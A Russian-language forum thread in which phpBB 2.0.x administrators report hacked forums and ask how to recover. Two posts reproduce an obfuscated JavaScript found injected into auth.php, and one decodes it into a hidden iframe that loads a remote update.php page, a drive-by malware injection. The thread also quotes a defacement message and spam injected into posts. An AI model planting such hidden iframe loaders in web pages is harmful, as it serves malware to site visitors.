Взломали форум phpBB 2.0.21, нужна помощь восстановить!

[Boglik]

подскажите пожалуста, и скажите как был взломан форум, как защитится от повторного?

Смотри логи.[/quote]

[Ne$ter]

подскажите пожалуста, и скажите как был взломан форум

протелепатировать чтоли?

Хотябы подскажите как вернуть админку.

Добавлено спустя 15 минут 31 секунду:

25 include($phpbb_root_path . 'extension.inc');
26 include($phpbb_root_path . 'common.'.$phpEx);


31 $userdata = session_pagestart($user_ip, PAGE_INDEX);

[ParSulTang]

crash, ну я это и имел ввиду (не верно выразился). Будут залатываться уязвимости дальше?

[0-n-e]

у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:

Код: Выделить всё

<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>

Скрипт удалил, все стало на свои места!
что это может быть?

[Alek$]

0-n-e
это может быть взлом.
Обновите все скрипты на сайте и проверьте их на наличие бекдоров.

[Ne$ter]

Немного посидел и запустилось дальше, но есть одна проблема, прошу помочь.
было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но
Кодгда заходиш в админку, то при вводе первого пароля выбрасывает вродебы как на индексовую страницу форума без картинок, но я не активирован, хотя путь указан правильно.

Что может быть, подскажите!

[/DiOs]

было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но

Вы уверены, что вы исправили, а не заменили??? Где бы то ни было, первое осначает "текущий каталог", а второе -- "родительский каталог". Что сказать-то хотели?

[0-n-e]

проверьте их на наличие бекдоров.

как это сделать?

[Alek$]

0-n-e
сравнить с бекапами.

[Rostunov]

у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:

Код: Выделить всё

<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>

Скрипт удалил, все стало на свои места!
что это может быть?

У меня тоже самое. Интересно, что этот скрипт делает, как расшифровать?

Добавлено

Ага, декодировал этот код:

Код: Выделить всё

<iFrAmE sRc="http://www.msupdate.org/update_files/update.php" sCROllINg='no' wIdTh="0001" hEigHt='0001' sTYle="display:none" name="an4ssoll">budopesht...///</iFrAmE>

[batss]

Добрый день! Подскажите, пожалуйста!
С сегодняшнего дня при добавлении поста, перед текстом любого пользователя появляется строка: "http://casinopills.com/ukrainskomu_narodu/ tolko posmotrite, vot idioti!!!!" ...
Я не знаю где ее искать. Стыдно. Поискал файлы форума на ниличие хотя бы одного из слов - не нашел. Перезалил из бекапа файлы директорий templates и language - не помогает.
Подскажите, пожалуйста. Сайт и форум серьезный, а эта злополучная строчка, бросает позорную тень. Понятно, что взломали, но как это лечить??? Форум мой лежит здесь http://forum.shooting-ua.com/

[crash]

посмотрите автоцензор

[Поручик]

Остальные файлы перезалейте. И дайте тестовый аккаунт, что-то не нашел этой строки.

[batss]

Уважаемые Знатоки!
Приношу свои извинения, что не смог ответить сразу. Был в дали от компьютера.
Спасибо. Проблема решена. Был и сидит вирус на локальном компьютере. Т.к. даже на тестовом тоже самое - с других же машин - проблема не замечена.

[V_r]

Господа!

Уже второй раз ломают мой форум.
Оба раза одна и таже контора.

Оба раза кто-то получал права админа и оставлял мне следующее сообщение под моим же ником:

HACKED BY SECURITYBUS

CONTACT ME: securitybus@gmail.com

____evilc0der.com/defacer/1/SecurityBus/

удалив попутно часть сообщений форума


Версия была 2.0.22.

После первого раза обновил до 2.0.23. Востановил базу (хорошо успел бекап сделать). Вроде бы притих. Но через 5 дней опять обьявился с тем же самым сообщением. Засек IP, но они у него меняются. Заметил, что перед атакой похоже или затирался или изменялся .htaccess

На форуме установлено много модов, может какой-то из них открыл дыру в системе?

Подскажите, как с этим хакером бороться?

Log-hakera.txt

Проанализировав лог, пришел к выводу, что админ права хацкер получил через wap-gate форума.
Правильно?
Поэтому наверное буду удалять этот мод.